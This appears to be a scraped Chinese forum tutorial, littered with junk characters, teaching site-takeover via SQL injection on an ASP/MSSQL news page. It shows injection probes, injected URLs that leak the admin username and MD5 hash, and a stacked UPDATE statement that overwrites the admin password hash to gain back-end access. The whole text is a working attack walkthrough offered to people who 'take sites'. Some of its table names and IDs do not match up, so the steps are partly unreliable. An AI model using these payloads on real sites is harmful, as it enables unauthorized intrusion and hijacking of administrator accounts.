经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。& t" v8 ]* g; K5 r# `1 N( ~3 V
可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)
/ F [! {7 E7 o$ U! q测试如下:3 E. U Y6 K3 K @* s5 {" |) R
http://www.tmdsb.com/news.asp?id=1211 ?% c, E% S6 |3 r2 z0 |2 e0 d5 y
在地址后输入单引号,显示; _9 g, l3 @5 y
Microsoft OLE DB Provider for SQL Server 错误 ’80040e14’! G, f: }# u9 |: d1 E
字符串 ’’’ 之前有未闭合的引号
' c! J* ?2 z- }0 [& \/news/tmdws.asp,行63
) `" ]' ?' q: |6 o* M( C说明没有过滤单引号且数据库是MSSQL.: z6 f A( b# i: O$ d, @
and 1=1正常。and 1=2出错。肯定存在注入4 q+ b9 f; [1 v
接着输入
6 v' d8 Q6 Z/ @ jhttp://www.tmdsb.com/news.asp?id=1 or admin_user in (select id from admin)
" P$ ?( R4 e" Q% o: L9 f得到帐号为:admin% Z5 V8 i6 L. [6 T3 k
http://www.tmdsb.com/news.asp?id=121 or admin_password in (select id from admin)4 r+ i+ h1 s& ^& M
得到密码为:a4716077c2ba075c
9 u) T/ D/ \' l V) f接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433
: ~. q4 p0 b4 \- }命令如下 :
: c* S8 _ j/ R6 A: ^+ v+ J;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–
, }% h) T) c- v" d这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的 |